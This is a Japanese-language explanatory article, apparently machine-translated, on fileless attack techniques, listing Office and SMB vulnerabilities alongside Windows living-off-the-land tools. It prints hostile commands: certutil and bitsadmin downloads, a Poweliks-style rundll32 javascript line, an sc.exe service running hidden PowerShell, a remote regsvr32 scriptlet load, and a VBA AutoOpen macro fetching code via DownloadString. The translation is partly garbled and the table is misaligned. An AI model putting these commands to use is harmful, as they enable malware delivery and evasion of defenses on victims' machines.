セキュリティの分野では、ファイルレス攻撃は非常に深刻な脅威を意味します。「ファイルなし」という用語は、悪意のあるファイル検出テクノロジーを回避する方法を議論するときに生まれた用語です。「ファイルレス攻撃」は、回避することを出発点とする単なる攻撃戦略です。悪意のあるファイルをディスクに置く、従来のセキュリティソフトウェアの検出を回避するため。
この知識分野には、ウイルスの逆分析と侵入テストの2つの主要な領域が含まれます。
ファイルレス攻撃の種類
近年のより有名なプロトコルの脆弱性とOfficeの脆弱性:
ウイルス名 | 脆弱性タイプ | CVE番号 | 脆弱性の場所 |
---|---|---|---|
オフィスの脆弱性 | CVE-2017-0199 | 埋め込まれたOLE2LINKオブジェクト | |
オフィスの脆弱性 | CVE-2017-11882(ナイトメアフォーミュラワン) | 数式エディタEQNEDT32.EXE | |
オフィスの脆弱性 | CVE-2018-0802(ナイトメアフォーミュラII) | 数式エディタEQNEDT32.EXE | |
泣きたい | SMBの脆弱性 | ms17-010 | Windowsオペレーティングシステムのポート445 |
SQLSlammer(サファイア) | WEBの脆弱性 | — | SQLSERVER2000解析ポート1434バッファオーバーフローの脆弱性 |
CVE-2018-0802脆弱性の再現と分析
https://www.freebuf.com/vuls/160386.html
ファイルレス攻撃で頻繁に使用されるファイルと方法
certutil.exe
は、指定されたURLからファイルをダウンロードし、outfile.fileに保存します。certuil.exe-urlcache-split -f [URL] outfile.file; base64のエンコードとデコードなど。
AutoITスクリプト
Autoit3decompiler-Exe2Autツールを使用して実行可能ファイルを逆コンパイルします。
ダウンロードリンク:http://domoticx.com/autoit3-decompiler-exe2aut/
このプログラムは、Windowsでの証明書サービスのインストールプログラムであり、証明書をダウンロード、エンコード、およびデコードできます。実際のペネトレーション環境では、スクリプトをアップロードできない状況を解決するためにも使用できます。
mshta.exeはHTAファイルを実行します
HTAはHTMLApplication(HTML application)の略で、ソフトウェア開発の新しい概念です。HTMLをHTA形式で直接保存する独立したアプリケーションソフトウェアであり、そのようなプログラミング言語によって設計されたソフトウェアインターフェイスと同じです。 VBおよびC ++として。長い間、HTAファイルは、Web攻撃や実際のマルウェアダウンロードプログラムによって悪意のあるプログラムの一部として使用されてきました。HTAファイルは、ネットワークセキュリティの分野で広く知られています。赤と青のチームの観点からは、HTAファイルはアプリケーションのホワイトリストをバイパスするための貴重な「古い」方法の1つです。
bitsadmin
cmdウィンドウで、bitsadminを使用してファイアウォールをバイパスし、トロイの木馬をダウンロードできます。
schtasks.exe
コントロールパネル-システムセキュリティ管理ツール-タスクスケジューラ
または直接開くtaskschd.mscプログラム
スケジュールされたタスク自体は、UAC制限を直接バイパスして、昇格された特権で実行できます。
Rundll32.exeの
通常のrundll32.exeパラメータ:RUNDLL32.EXE dll名、エントリポイント、オプションの引数
Poweliksが使用するテクニック:
rundll32.exe javascript:”\..\ mshtml,RunHTMLApplication “;alert(‘payload’);
sc.exe
sc create Payloadservice binpath= “C:\Windows\system32\cmd.exe /c start /b /min powershell.exe -nop -w hidden [REMOVED]”
ق32。exe
Dromedanドロッパーは、次の方法を使用して悪意のあるDLLをロードするためにق32。exeを使用しました。
regsvr32 /s /n /u /i:%REMOTE_MALICIOUS_SCT_SCRIPT% scrobj.dll
Wmic.exe
WMIデータは、%System%\ wbem \ repository全体で複数のファイルにエンコードされて保存されます
。Cozyduke攻撃組織は、悪意のあるペイロード全体をWMIリポジトリに配置することを好みます。
シャットダウンの書き戻し
Dridex組織は、悪意のあるファイルの公開を最小限に抑えるために、マシンがシャットダウンされたときにコールバックして悪意のあるファイルを解放することを好みます。同様に、ブラッドフォックスのルートキットはシャットダウン期間を使用して悪意のあるドライバーを解放します。
VBマクロはWMIを呼び出し、次にPowerShellを呼び出します
Sub AutoOpen()
[REMOVED]
Set objWMIService = GetObject(“winmgmts:\\” &
strComputer & “\root\cimv2”)
[REMOVED]
objProcess.Create o & “ -ExecutionPolicy Bypass
-WindowStyle Hidden -noprofile -noexit -c if
([IntPtr]::size -eq 4) {
(new-oabject Net.Webclient.
DownloadString(“ & [REMOVED]
End Sub
参照
https://www.cnblogs.com/meandme/p/10337267.html
スケジュールされたタスクとbitsadminを使用して、悪意のあるコードの長期的な制御を実現します
https://blog.csdn.net/qq_31481187/article/details/57540231